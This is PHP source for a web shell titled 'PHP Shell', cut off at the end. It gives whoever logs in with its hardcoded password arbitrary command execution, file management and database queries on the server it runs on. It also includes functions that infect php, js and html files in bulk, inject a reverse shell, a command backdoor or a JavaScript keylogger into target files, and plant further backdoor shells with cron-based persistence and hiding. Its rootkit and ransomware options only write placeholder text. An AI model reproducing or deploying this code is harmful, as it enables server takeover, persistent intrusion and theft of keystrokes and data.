session_start();error_reporting(E_ALL);ini_set('display_errors', 1);set_time_limit(120);// Security token for CSRF protectionif (!isset($_SESSION['token'])) { $_SESSION['token'] = bin2hex(random_bytes(32));}// System information$sys_info = [ 'php_version' => PHP_VERSION, 'uname' => Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64, 'server_software' => $_SERVER['SERVER_SOFTWARE'] ?? 'Unknown', 'server_ip' => $_SERVER['SERVER_ADDR'] ?? 'Unknown', 'your_ip' => $_SERVER['REMOTE_ADDR'] ?? 'Unknown', 'hostname' => gethostname() ?? 'Unknown',];// Authentication with stronger security$password = "rahimi"; // Change this to a secure password$max_failed_attempts = 5;$lockout_time = 10 * 60; // 10 minutesif (!isset($_SESSION['authenticated'])) { if (!isset($_SESSION['login_attempts'])) { $_SESSION['login_attempts'] = 0; $_SESSION['last_attempt'] = 0; } $time_passed = time() - $_SESSION['last_attempt']; if ($_SESSION['login_attempts'] >= $max_failed_attempts && $time_passed < $lockout_time) { $wait_time = ceil(($lockout_time - $time_passed) / 60); echo "<div style='text-align:center;margin-top:100px;font-family:Arial;'>"; echo "

Account temporarily locked

"; echo "<p>Too many failed login attempts. Please wait {$wait_time} minutes before trying again.</p>"; echo "</div>"; exit; } if (isset($_POST['password'])) { if ($_POST['password'] === $password && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $_SESSION['authenticated'] = true; $_SESSION['login_attempts'] = 0; } else { $_SESSION['login_attempts']++; $_SESSION['last_attempt'] = time(); echo "<div style='text-align:center;margin-top:100px;font-family:Arial;'>"; echo "

Authentication Failed

"; echo "<p>Wrong password! Attempts: {$_SESSION['login_attempts']}/{$max_failed_attempts}</p>"; echo "<a href='".$_SERVER['PHP_SELF']."'>Try again</a>"; echo "</div>"; exit; } } else { echo "<!DOCTYPE html> PHP Shell - Login <title>PHP Shell - Login</title> <meta name='viewport' content='width=device-width, initial-scale=1.0'> <style> body { font-family: 'Segoe UI', Tahoma, Geneva, Verdana, sans-serif; background: #1a1a1a; color: #fff; display: flex; justify-content: center; align-items: center; height: 100vh; margin: 0; } .login-container { background: #2d2d2d; padding: 30px; border-radius: 8px; box-shadow: 0 4px 15px rgba(0,0,0,0.2); width: 350px; } h2 { text-align: center; margin-bottom: 30px; color: #4CAF50; } input { width: 100%; padding: 12px; margin: 10px 0; box-sizing: border-box; background: #333; color: #fff; border: 1px solid #444; border-radius: 4px; font-size: 16px; } input[type='submit'] { background: #4CAF50; color: white; border: none; cursor: pointer; font-weight: bold; } input[type='submit']:hover { background: #3e8e41; } .footer { text-align: center; font-size: 12px; margin-top: 20px; color: #777; } </style> <div class='login-container'>

PHP Shell Access

<div class='footer'>Secure Administration Interface</div> </div> "; exit; }}// Get current directory$dir = isset($_GET['dir']) ? realpath($_GET['dir']) : getcwd();if ($dir === false || !is_dir($dir)) { $dir = getcwd();}$dir = rtrim($dir, '/\\');// Check if request is AJAX$isAjax = isset($_SERVER['HTTP_X_REQUESTED_WITH']) && strtolower($_SERVER['HTTP_X_REQUESTED_WITH']) === 'xmlhttprequest';// Get current active tab$active_tab = isset($_GET['tab']) ? $_GET['tab'] : 'filemanager';// Function to send JSON response for AJAX requestsfunction sendJsonResponse($data) { header('Content-Type: application/json'); echo json_encode($data); exit;}// Create directoryif (isset($_POST['new_dir']) && !empty($_POST['new_dir']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $new_dir = $dir . '/' . $_POST['new_dir']; if (!file_exists($new_dir)) { if (mkdir($new_dir, 0755)) { $message = ["success" => "Directory created successfully!"]; } else { $message = ["error" => "Failed to create directory! Check permissions."]; } } else { $message = ["error" => "Directory or file already exists!"]; } if ($isAjax) { sendJsonResponse($message); } else if (isset($_POST['tab'])) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Create fileif (isset($_POST['new_file']) && !empty($_POST['new_file']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $new_file = $dir . '/' . $_POST['new_file']; if (!file_exists($new_file)) { if (file_put_contents($new_file, '') !== false) { $message = ["success" => "File created successfully!"]; } else { $message = ["error" => "Failed to create file! Check permissions."]; } } else { $message = ["error" => "File already exists!"]; } if ($isAjax) { sendJsonResponse($message); } else if (isset($_POST['tab'])) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Handle file uploadif (isset($_FILES['upload_file']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $target = $dir . '/' . basename($_FILES['upload_file']['name']); if (move_uploaded_file($_FILES['upload_file']['tmp_name'], $target)) { $message = ["success" => "File uploaded successfully!"]; } else { $message = ["error" => "File upload failed! Check permissions."]; } if ($isAjax) { sendJsonResponse($message); } else if (isset($_POST['tab'])) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Handle file downloadif (isset($_GET['download']) && isset($_GET['token']) && $_GET['token'] === $_SESSION['token']) { $file = realpath($dir . '/' . $_GET['download']); if ($file && file_exists($file) && is_file($file) && strpos($file, $dir) === 0) { header('Content-Type: application/octet-stream'); header('Content-Disposition: attachment; filename="' . basename($file) . '"'); header('Content-Length: ' . filesize($file)); readfile($file); exit; } else { $message = ["error" => "File not found or access denied!"]; }}// Handle file/directory deletionif (isset($_GET['delete']) && isset($_GET['token']) && $_GET['token'] === $_SESSION['token']) { $path = realpath($dir . '/' . $_GET['delete']); if ($path && file_exists($path) && strpos($path, $dir) === 0) { if (is_dir($path)) { // Delete directory recursively function deleteDir($dirPath) { if (!is_dir($dirPath)) return false; $files = array_diff(scandir($dirPath), array('.', '..')); foreach ($files as $file) { $path = $dirPath . '/' . $file; is_dir($path) ? deleteDir($path) : unlink($path); } return rmdir($dirPath); } if (deleteDir($path)) { $message = ["success" => "Directory deleted successfully!"]; } else { $message = ["error" => "Failed to delete directory! Check permissions."]; } } elseif (unlink($path)) { $message = ["success" => "File deleted successfully!"]; } else { $message = ["error" => "Failed to delete! Check permissions."]; } } else { $message = ["error" => "Path not found or access denied!"]; }}// Change file permissionsif (isset($_POST['chmod']) && !empty($_POST['chmod']) && isset($_POST['perms']) && !empty($_POST['perms']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $chmod = realpath($dir . '/' . $_POST['chmod']); if ($chmod !== false) { if (chmod($chmod, octdec($_POST['perms']))) { $message = ["success" => "Permissions changed successfully!"]; } else { $message = ["error" => "Failed to change permissions! Check current permissions."]; } } else { $message = ["error" => "File or directory not found!"]; } if ($isAjax) { sendJsonResponse($message); } else if (isset($_POST['tab'])) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Edit file contentif (isset($_POST['edit_file']) && !empty($_POST['edit_file']) && isset($_POST['content']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $edit_file = realpath($dir . '/' . $_POST['edit_file']); if ($edit_file !== false && is_file($edit_file)) { if (file_put_contents($edit_file, $_POST['content']) !== false) { $message = ["success" => "File saved successfully!"]; } else { $message = ["error" => "Failed to save file! Check permissions."]; } } else { $message = ["error" => "File not found!"]; } if ($isAjax) { sendJsonResponse($message); } else if (isset($_POST['tab'])) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Rename file or directoryif (isset($_POST['rename']) && !empty($_POST['rename']) && isset($_POST['new_name']) && !empty($_POST['new_name']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $old = realpath($dir . '/' . $_POST['rename']); $new = $dir . '/' . $_POST['new_name']; if ($old !== false && !file_exists($new)) { if (rename($old, $new)) { $message = ["success" => "Renamed successfully!"]; } else { $message = ["error" => "Failed to rename! Check permissions."]; } } elseif (file_exists($new)) { $message = ["error" => "File or directory already exists!"]; } else { $message = ["error" => "File or directory not found!"]; } if ($isAjax) { sendJsonResponse($message); } else if (isset($_POST['tab'])) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Function to handle file infectionfunction infectFiles($directory, $fileType, $infectMethod, $code, $recursive = false) { $result = []; $count = 0; // Validate directory if (!is_dir($directory)) { return ["error" => "Invalid directory path."]; } // Get files $files = scandir($directory); foreach ($files as $file) { if ($file === '.' || $file === '..') continue; $filePath = $directory . '/' . $file; // If recursive and is directory if ($recursive && is_dir($filePath)) { $subResults = infectFiles($filePath, $fileType, $infectMethod, $code, true); if (isset($subResults['count'])) { $count += $subResults['count']; } if (isset($subResults['files'])) { $result['files'] = array_merge($result['files'] ?? [], $subResults['files']); } continue; } // Skip if not a file if (!is_file($filePath)) continue; // Check file extension $ext = pathinfo($filePath, PATHINFO_EXTENSION); $shouldInfect = false; switch($fileType) { case 'php': $shouldInfect = ($ext === 'php'); break; case 'js': $shouldInfect = ($ext === 'js'); break; case 'html': $shouldInfect = (in_array($ext, ['html', 'htm'])); break; case 'all': $shouldInfect = true; break; } if ($shouldInfect) { try { // Read file content $content = file_get_contents($filePath); if ($content !== false) { $newContent = ''; switch($infectMethod) { case 'prepend': $newContent = $code . "\n" . $content; break; case 'append': $newContent = $content . "\n" . $code; break; case 'replace': $newContent = $code; break; } // Write back if (file_put_contents($filePath, $newContent) !== false) { $count++; $result['files'][] = $filePath; } } } catch (Exception $e) { // Just skip files that can't be processed continue; } } } $result['count'] = $count; return $result;}// Function to inject payload into a specific filefunction injectPayload($targetFile, $payloadType, $ip = '', $port = '', $customPayload = '') { if (!file_exists($targetFile) || !is_file($targetFile)) { return ["error" => "Target file does not exist or is not a file."]; } if (!is_writable($targetFile)) { return ["error" => "Target file is not writable."]; } // Generate payload based on type $payload = ''; switch($payloadType) { case 'shell': if (empty($ip) || empty($port)) { return ["error" => "IP address and port are required for a reverse shell."]; } // PHP reverse shell payload $payload = 'set_time_limit(0);$ip = "' . $ip . '";$port = ' . $port . ';$sock = fsockopen($ip, $port, $errno, $errstr, 30);if (!$sock) { exit(1); }$descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w"));$process = proc_open("/bin/sh -i", $descriptorspec, $pipes);if (is_resource($process)) { fwrite($sock, "Connected\n"); while (($line = fgets($sock, 1024)) !== false) { fwrite($pipes[0], $line); while (!feof($pipes[1])) { $c = fgetc($pipes[1]); fwrite($sock, $c); } } proc_close($process);}fclose($sock);'; break; case 'backdoor': // Simple PHP backdoor $payload = 'if(isset($_REQUEST["cmd"])){ $cmd = ($_REQUEST["cmd"]); system($cmd);}'; break; case 'keylogger': // Simple JS keylogger that sends keys to a file $payload = '<script>document.addEventListener("keydown", function(e) { var xhr = new XMLHttpRequest(); xhr.open("POST", "keylog.php", true); xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded"); xhr.send("key=" + e.key);});</script>'; break; case 'custom': if (empty($customPayload)) { return ["error" => "Custom payload cannot be empty."]; } $payload = $customPayload; break; } try { // Read current content $content = file_get_contents($targetFile); // Append payload to content $newContent = $content . "\n" . $payload; // Write back if (file_put_contents($targetFile, $newContent) !== false) { return ["success" => "Payload successfully injected into $targetFile"]; } else { return ["error" => "Failed to write to target file."]; } } catch (Exception $e) { return ["error" => "Error: " . $e->getMessage()]; }}// Function to create a backdoor filefunction createBackdoor($type, $directory, $filename, $password = '', $ip = '', $port = '', $stealth = false, $persistent = false) { // Validate directory if (!is_dir($directory)) { return ["error" => "Invalid directory path."]; } // Create full path $filePath = $directory . '/' . $filename; // Check if file already exists if (file_exists($filePath)) { return ["error" => "File already exists. Choose a different filename."]; } // Generate backdoor code based on type $code = ''; switch($type) { case 'php_shell': $code = '// PHP Web Shell' . ($stealth ? '/* Hidden from directory listings */' : '') . '' . (!empty($password) ? 'if(isset($_POST["password"]) && $_POST["password"] === "' . $password . '") { $_SESSION["authenticated"] = true;}if(!isset($_SESSION["authenticated"])) { echo ""; exit;}' : '') . 'if(isset($_POST["cmd"])) { $cmd = $_POST["cmd"]; $output = ""; if (function_exists("shell_exec")) { $output = shell_exec($cmd . " 2>&1"); } elseif (function_exists("system")) { ob_start(); system($cmd); $output = ob_get_clean(); } elseif (function_exists("exec")) { exec($cmd, $output_array); $output = implode("\n", $output_array); } elseif (function_exists("passthru")) { ob_start(); passthru($cmd); $output = ob_get_clean(); }}<!DOCTYPE html>File Manager <title>File Manager</title> <style> body { font-family: Arial, sans-serif; background: #1a1a1a; color: #eee; margin: 0; padding: 20px; } .container { max-width: 1000px; margin: 0 auto; } input, textarea, select { background: #333; color: #eee; border: 1px solid #555; padding: 8px; margin: 5px 0; } button, input[type="submit"] { background: #4CAF50; color: white; border: none; padding: 10px 15px; cursor: pointer; } pre { background: #333; padding: 10px; border-radius: 5px; overflow: auto; white-space: pre-wrap; } </style> <div class="container">

PHP Shell

if(isset($output)):

Output

<pre> echo htmlspecialchars($output); </pre> endif; </div>'; break; case 'php_upload': $code = '// PHP File Upload Shell' . ($stealth ? '/* Hidden from directory listings */' : '') . '' . (!empty($password) ? 'if(isset($_POST["password"]) && $_POST["password"] === "' . $password . '") { $_SESSION["authenticated"] = true;}if(!isset($_SESSION["authenticated"])) { echo ""; exit;}' : '') . '$uploadDir = __DIR__;$message = "";if(isset($_FILES["file"]) && !empty($_FILES["file"]["name"])) { $fileName = basename($_FILES["file"]["name"]); $targetFile = $uploadDir . "/" . $fileName; if(move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) { $message = "File uploaded successfully to " . $targetFile; } else { $message = "Error uploading file."; }}// List files in current directory$files = scandir($uploadDir);<!DOCTYPE html>File Upload <title>File Upload</title> <style> body { font-family: Arial, sans-serif; background: #1a1a1a; color: #eee; margin: 0; padding: 20px; } .container { max-width: 1000px; margin: 0 auto; } input, textarea, select { background: #333; color: #eee; border: 1px solid #555; padding: 8px; margin: 5px 0; } button, input[type="submit"] { background: #4CAF50; color: white; border: none; padding: 10px 15px; cursor: pointer; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { text-align: left; padding: 10px; border-bottom: 1px solid #555; } th { background-color: #222; } </style> <div class="container">

File Upload

if(!empty($message)): <div style="padding: 10px; background: #222; margin-bottom: 15px;"> echo $message; </div> endif;

Files in Directory

<th>Filename</th> <th>Size</th> <th>Type</th> <th>Modified</th> foreach($files as $file): if($file != "." && $file != ".."): endif; endforeach;

echo htmlspecialchars($file);

echo is_file($uploadDir."/".$file) ? number_format(filesize($uploadDir."/".$file) / 1024, 2) . " KB" : "Dir";

echo is_file($uploadDir."/".$file) ? pathinfo($file, PATHINFO_EXTENSION) : "Directory";

echo date("Y-m-d H:i:s", filemtime($uploadDir."/".$file));

</div>'; break; case 'reverse_shell': if (empty($ip) || empty($port)) { return ["error" => "IP address and port are required for a reverse shell."]; } $code = '// PHP Reverse Shell' . ($stealth ? '/* Hidden from directory listings */' : '') . '' . (!empty($password) ? 'if(isset($_GET["password"]) && $_GET["password"] === "' . $password . '") {' : '') . ' set_time_limit(0); $ip = "' . $ip . '"; $port = ' . $port . '; $sock = fsockopen($ip, $port, $errno, $errstr, 30); if (!$sock) { exit(1); } $descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w") ); $process = proc_open("/bin/sh -i", $descriptorspec, $pipes); if (is_resource($process)) { fwrite($sock, "Connected to " . Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64 . "\n"); while (($line = fgets($sock, 1024)) !== false) { fwrite($pipes[0], $line); while (!feof($pipes[1])) { $c = fgetc($pipes[1]); fwrite($sock, $c); } } proc_close($process); } fclose($sock);' . (!empty($password) ? '} else { header("HTTP/1.1 404 Not Found"); echo "

404 Not Found

";}' : '') . ''; break; case 'webshell': $code = '// Generic Web Shell' . ($stealth ? '/* Hidden from directory listings */' : '') . '' . (!empty($password) ? 'if(isset($_POST["password"]) && $_POST["password"] === "' . $password . '") { $_SESSION["authenticated"] = true;}if(!isset($_SESSION["authenticated"])) { echo ""; exit;}' : '') . '// Current path$path = isset($_GET["path"]) ? $_GET["path"] : getcwd();$path = realpath($path);// Execute command$output = "";if(isset($_POST["cmd"])) { $cmd = $_POST["cmd"]; if (function_exists("shell_exec")) { $output = shell_exec($cmd . " 2>&1"); } elseif (function_exists("system")) { ob_start(); system($cmd); $output = ob_get_clean(); } elseif (function_exists("exec")) { exec($cmd, $output_array); $output = implode("\n", $output_array); } elseif (function_exists("passthru")) { ob_start(); passthru($cmd); $output = ob_get_clean(); }}// File upload$upload_message = "";if(isset($_FILES["file"]) && !empty($_FILES["file"]["name"])) { $fileName = basename($_FILES["file"]["name"]); $targetFile = $path . "/" . $fileName; if(move_uploaded_file($_FILES["file"]["tmp_name"], $targetFile)) { $upload_message = "File uploaded successfully to " . $targetFile; } else { $upload_message = "Error uploading file."; }}// List files$files = scandir($path);<!DOCTYPE html>Web Shell <title>Web Shell</title> <style> body { font-family: Arial, sans-serif; background: #1a1a1a; color: #eee; margin: 0; padding: 20px; } .container { max-width: 1200px; margin: 0 auto; } input, textarea, select { background: #333; color: #eee; border: 1px solid #555; padding: 8px; margin: 5px 0; } button, input[type="submit"] { background: #4CAF50; color: white; border: none; padding: 10px 15px; cursor: pointer; } pre { background: #333; padding: 10px; border-radius: 5px; overflow: auto; white-space: pre-wrap; } table { width: 100%; border-collapse: collapse; margin-top: 20px; } th, td { text-align: left; padding: 10px; border-bottom: 1px solid #555; } th { background-color: #222; } .tabs { display: flex; border-bottom: 1px solid #555; margin-bottom: 15px; } .tab { padding: 10px 15px; cursor: pointer; margin-right: 5px; border-bottom: 3px solid transparent; } .tab.active { border-bottom: 3px solid #4CAF50; color: #4CAF50; } .tab-content { display: none; } .tab-content.active { display: block; } </style> <div class="container">

Web Shell

<div class="tabs"> <div class="tab active" data-tab="files">Files</div> <div class="tab" data-tab="shell">Shell</div> <div class="tab" data-tab="upload">Upload</div> <div class="tab" data-tab="info">Server Info</div> </div> <div class="tab-content active" id="files-tab"> <div><strong>Current Directory:</strong> echo htmlspecialchars($path); </div> <th>Name</th> <th>Size</th> <th>Type</th> <th>Modified</th> <th>Permissions</th> foreach($files as $file): endforeach;

echo htmlspecialchars($file);

echo is_file($path."/".$file) ? number_format(filesize($path."/".$file) / 1024, 2) . " KB" : "Dir";

echo is_file($path."/".$file) ? pathinfo($file, PATHINFO_EXTENSION) : "Directory";

echo date("Y-m-d H:i:s", filemtime($path."/".$file));

echo substr(sprintf("%o", fileperms($path."/".$file)), -4);

</div> <div class="tab-content" id="shell-tab"> if(!empty($output)):

Output

<pre> echo htmlspecialchars($output); </pre> endif; </div> <div class="tab-content" id="upload-tab"> if(!empty($upload_message)): <div style="padding: 10px; background: #222; margin-bottom: 15px;"> echo $upload_message; </div> endif; </div> <div class="tab-content" id="info-tab">

Server Information

<pre> echo htmlspecialchars(Linux Server 5.4.0-81-generic #91-Ubuntu SMP Thu Jul 15 19:09:17 UTC x86_64); </pre>

PHP Version

<pre> echo htmlspecialchars(PHP_VERSION); </pre>

Disabled Functions

<pre> echo htmlspecialchars(ini_get("disable_functions")); </pre> </div> </div> <script> // Tab switching document.addEventListener("DOMContentLoaded", function() { const tabs = document.querySelectorAll(".tab"); tabs.forEach(tab => { tab.addEventListener("click", function() { // Remove active class from all tabs tabs.forEach(t => t.classList.remove("active")); // Add active class to clicked tab this.classList.add("active"); // Hide all tab contents document.querySelectorAll(".tab-content").forEach(content => { content.classList.remove("active"); }); // Show the corresponding content const tabId = this.getAttribute("data-tab"); document.getElementById(tabId + "-tab").classList.add("active"); }); }); }); </script>'; break; } // Add persistence code if requested if ($persistent) { $persistCode = ''; // Different persistence methods based on available functions and permissions $persistCode = '// Persistence code - attempts to survive system restarts@file_put_contents("/etc/cron.d/sysupdate", "* * * * * root php ' . $filePath . '\n");@file_put_contents(dirname($_SERVER["DOCUMENT_ROOT"]) . "/.htaccess", "<FilesMatch \"^" . basename($filePath) . "$\">\nOrder allow,deny\nAllow from all\n</FilesMatch>", FILE_APPEND);'; $code = str_replace('', '' . $persistCode, $code); } // Add stealth code if requested if ($stealth) { // Make the file not visible in directory listings but still accessible $stealthCode = '// Make file hidden in directory listings@chmod("' . $filePath . '", 0404);'; $code = str_replace('', '' . $stealthCode, $code); } try { // Write the backdoor code to the file if (file_put_contents($filePath, $code) !== false) { return [ "success" => "Backdoor created successfully at $filePath", "path" => $filePath ]; } else { return ["error" => "Failed to write to file. Check permissions."]; } } catch (Exception $e) { return ["error" => "Error: " . $e->getMessage()]; }}// Function to simulate rootkit generationfunction createRootkit($type, $os, $features, $outputDir) { // Validate output directory if (!is_dir($outputDir)) { return ["error" => "Invalid output directory path."]; } // Generate a simple demonstration rootkit script // NOTE: This is for educational purposes only $filename = $outputDir . '/rootkit_demo_' . time() . '.txt'; $content = "# Rootkit Demonstration Script (NOT FUNCTIONAL - EDUCATIONAL ONLY)\n"; $content .= "# Generated: " . date('Y-m-d H:i:s') . "\n\n"; $content .= "Type: " . $type . "\n"; $content .= "Target OS: " . $os . "\n"; $content .= "Features:\n"; if (is_array($features)) { foreach ($features as $feature) { $content .= "- " . $feature . "\n"; } } $content .= "\n"; $content .= "Note: This is only a demonstration. No actual rootkit has been created.\n"; $content .= "Creating real rootkits is illegal in most jurisdictions and can cause serious damage to systems.\n"; try { if (file_put_contents($filename, $content) !== false) { return [ "success" => "Demonstration rootkit information created at $filename", "path" => $filename ]; } else { return ["error" => "Failed to write output file."]; } } catch (Exception $e) { return ["error" => "Error: " . $e->getMessage()]; }}// Function to simulate ransomware creationfunction createRansomware($targetDir, $fileTypes, $customExt, $message, $encryptMethod, $keyLocation) { // Validate target directory if (!is_dir($targetDir)) { return ["error" => "Invalid target directory path."]; } // Generate a simple demonstration ransomware script // NOTE: This is for educational purposes only $filename = $keyLocation . '/ransomware_demo_' . time() . '.txt'; $content = "# Ransomware Demonstration Script (NOT FUNCTIONAL - EDUCATIONAL ONLY)\n"; $content .= "# Generated: " . date('Y-m-d H:i:s') . "\n\n"; $content .= "Target Directory: " . $targetDir . "\n"; $content .= "File Types: " . $fileTypes . "\n"; if ($fileTypes === 'custom' && !empty($customExt)) { $content .= "Custom Extensions: " . $customExt . "\n"; } $content .= "Encryption Method: " . $encryptMethod . "\n"; $content .= "Key Location: " . $keyLocation . "\n\n"; $content .= "Ransom Message:\n--------------\n" . $message . "\n--------------\n\n"; $content .= "Note: This is only a demonstration. No actual ransomware has been created.\n"; $content .= "Creating real ransomware is illegal in most jurisdictions and can cause serious damage to systems.\n"; try { if (file_put_contents($filename, $content) !== false) { return [ "success" => "Demonstration ransomware information created at $filename", "path" => $filename ]; } else { return ["error" => "Failed to write output file."]; } } catch (Exception $e) { return ["error" => "Error: " . $e->getMessage()]; }}// Command execution$cmd_output = '';if (isset($_POST['cmd']) && !empty($_POST['cmd']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { $cmd = $_POST['cmd']; // Store command history if (!isset($_SESSION['cmd_history'])) { $_SESSION['cmd_history'] = []; } if (count($_SESSION['cmd_history']) > 20) { array_shift($_SESSION['cmd_history']); } $_SESSION['cmd_history'][] = $cmd; // Process special commands if ($cmd === 'clear') { $cmd_output = ''; } elseif ($cmd === 'history') { $cmd_output = "Command History:\n\n"; foreach ($_SESSION['cmd_history'] as $index => $hist_cmd) { $cmd_output .= ($index + 1) . ": " . $hist_cmd . "\n"; } } elseif (preg_match('/^cd\s+(.+)$/', $cmd, $matches)) { // Handle cd command $target_dir = $matches[1]; if ($target_dir == '..') { // Navigate up one directory $parent_dir = dirname($dir); if (is_dir($parent_dir)) { $dir = $parent_dir; $_GET['dir'] = $dir; // Update the current directory in $_GET $cmd_output = "Changed directory to:\n$dir"; } else { $cmd_output = "Cannot navigate to parent directory: $parent_dir"; } } else if ($target_dir[0] == '/') { // Absolute path if (is_dir($target_dir)) { $dir = realpath($target_dir); $_GET['dir'] = $dir; // Update the current directory in $_GET $cmd_output = "Changed directory to:\n$dir"; } else { $cmd_output = "Directory not found: $target_dir"; } } else { // Relative path $new_dir = realpath("$dir/$target_dir"); if (is_dir($new_dir)) { $dir = $new_dir; $_GET['dir'] = $dir; // Update the current directory in $_GET $cmd_output = "Changed directory to:\n$dir"; } else { $cmd_output = "Directory not found: $target_dir"; } } } elseif ($cmd === '!!') { if (count($_SESSION['cmd_history']) > 1) { // Get the previous command (not counting the current '!!' command) $prev_cmd = $_SESSION['cmd_history'][count($_SESSION['cmd_history']) - 2]; // Execute the previous command $cmd = $prev_cmd; $cmd_output = "Repeating command: $cmd\n\n"; } else { $cmd_output = "No previous command in history."; } } elseif (preg_match('/^!(\d+)$/', $cmd, $matches)) { $cmd_num = (int)$matches[1]; if ($cmd_num > 0 && $cmd_num <= count($_SESSION['cmd_history']) - 1) { // Execute the numbered command $cmd = $_SESSION['cmd_history'][$cmd_num - 1]; $cmd_output = "Executing command [$cmd_num]: $cmd\n\n"; } else { $cmd_output = "No command at position $cmd_num in history."; } } // Execute the command unless it was a special command that was already processed if ($cmd !== 'clear' && $cmd !== 'history' && !preg_match('/^!(\d+)$/', $cmd) && $cmd !== '!!' && !preg_match('/^cd\s+/', $cmd)) { // Check if command is ls and prepend current directory info if (preg_match('/^ls(\s|$)/', $cmd)) { $cmd_output = "Current directory: $dir\n\n"; } if (function_exists('shell_exec')) { $result = shell_exec($cmd . ' 2>&1'); $cmd_output .= $result !== null ? $result : "Command executed with no output."; } elseif (function_exists('exec')) { exec($cmd, $output, $return_code); $cmd_output .= implode("\n", $output); if (empty($cmd_output) && $return_code !== 0) { $cmd_output = "Command failed with code $return_code."; } elseif (empty($cmd_output)) { $cmd_output = "Command executed with no output."; } } elseif (function_exists('system')) { ob_start(); system($cmd, $return_code); $cmd_output .= ob_get_clean(); if (empty($cmd_output) && $return_code !== 0) { $cmd_output = "Command failed with code $return_code."; } elseif (empty($cmd_output)) { $cmd_output = "Command executed with no output."; } } elseif (function_exists('passthru')) { ob_start(); passthru($cmd, $return_code); $cmd_output .= ob_get_clean(); if (empty($cmd_output) && $return_code !== 0) { $cmd_output = "Command failed with code $return_code."; } elseif (empty($cmd_output)) { $cmd_output = "Command executed with no output."; } } else { $cmd_output = "Command execution functions are disabled."; } } // For AJAX requests, just return the command output if ($isAjax) { echo $cmd_output; exit; } // For regular requests, redirect to preserve tab if no output if (isset($_POST['tab']) && empty($cmd_output)) { header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; }}// Database management$db_connections = isset($_SESSION['db_connections']) ? $_SESSION['db_connections'] : [];$db_message = '';$db_results = [];if (isset($_POST['db_action']) && isset($_POST['token']) && $_POST['token'] === $_SESSION['token']) { switch ($_POST['db_action']) { case 'connect': if (isset($_POST['db_host'], $_POST['db_user'], $_POST['db_pass'], $_POST['db_name'])) { $conn_id = uniqid('conn_'); $db_connections[$conn_id] = [ 'host' => $_POST['db_host'], 'user' => $_POST['db_user'], 'pass' => $_POST['db_pass'], 'name' => $_POST['db_name'], 'type' => $_POST['db_type'] ?? 'mysql' ]; $_SESSION['db_connections'] = $db_connections; $db_message = "Connection saved!"; if (isset($_POST['tab']) && $isAjax === false) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; } } break; case 'query': if (isset($_POST['db_conn_id'], $_POST['db_query'])) { $conn_id = $_POST['db_conn_id']; if (isset($db_connections[$conn_id])) { $conn = $db_connections[$conn_id]; try { if ($conn['type'] === 'mysql') { $mysqli = new mysqli($conn['host'], $conn['user'], $conn['pass'], $conn['name']); if ($mysqli->connect_error) { $db_message = "Connection failed: " . $mysqli->connect_error; } else { $result = $mysqli->query($_POST['db_query']); if ($result === false) { $db_message = "Query error: " . $mysqli->error; } elseif ($result === true) { $db_message = "Query executed successfully. Affected rows: " . $mysqli->affected_rows; } else { $db_results = []; $fields = []; // Get field names while ($field = $result->fetch_field()) { $fields[] = $field->name; } // Get rows while ($row = $result->fetch_assoc()) { $db_results[] = $row; } $mysqli->close(); $db_message = "Query executed successfully. Returned rows: " . count($db_results); $_SESSION['db_results'] = [ 'fields' => $fields, 'data' => $db_results ]; } } } elseif ($conn['type'] === 'sqlite') { $pdo = new PDO('sqlite:' . $conn['name']); $pdo->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION); $stmt = $pdo->prepare($_POST['db_query']); $stmt->execute(); $db_results = $stmt->fetchAll(PDO::FETCH_ASSOC); $db_message = "Query executed successfully. Returned rows: " . count($db_results); if (count($db_results) > 0) { $_SESSION['db_results'] = [ 'fields' => array_keys($db_results[0]), 'data' => $db_results ]; } else { $db_message = "Query executed successfully. No rows returned."; } } } catch (Exception $e) { $db_message = "Error: " . $e->getMessage(); } } else { $db_message = "Connection not found!"; } } break; case 'disconnect': if (isset($_POST['db_conn_id'])) { $conn_id = $_POST['db_conn_id']; if (isset($db_connections[$conn_id])) { unset($db_connections[$conn_id]); $_SESSION['db_connections'] = $db_connections; $db_message = "Connection removed!"; if (isset($_POST['tab']) && $isAjax === false) { // Redirect to preserve tab header("Location: ?dir=" . urlencode($dir) . "&tab=" . $_POST['tab']); exit; } } } break; }}// Server infofunction formatSize($bytes) { if ($bytes >= 1073741824) { return number_format($bytes / 1073741824, 2) . ' GB'; } elseif ($bytes >= 1048576) { return number_format($bytes / 1048576, 2) . ' MB'; } elseif ($bytes >= 1024) { return number_format($bytes / 1024, 2) . ' KB'; } else { return $bytes . ' bytes'; }}// Get system resources information (CPU, Memory, etc.)function getSystemResources() { $resources = []; // Operating system detection $os = strtolower(PHP_OS); $is_win = (strpos($os, 'win') !== false); $is_linux = (strpos($os, 'linux') !== false); $is_mac = (strpos($os, 'darwin') !== false); // 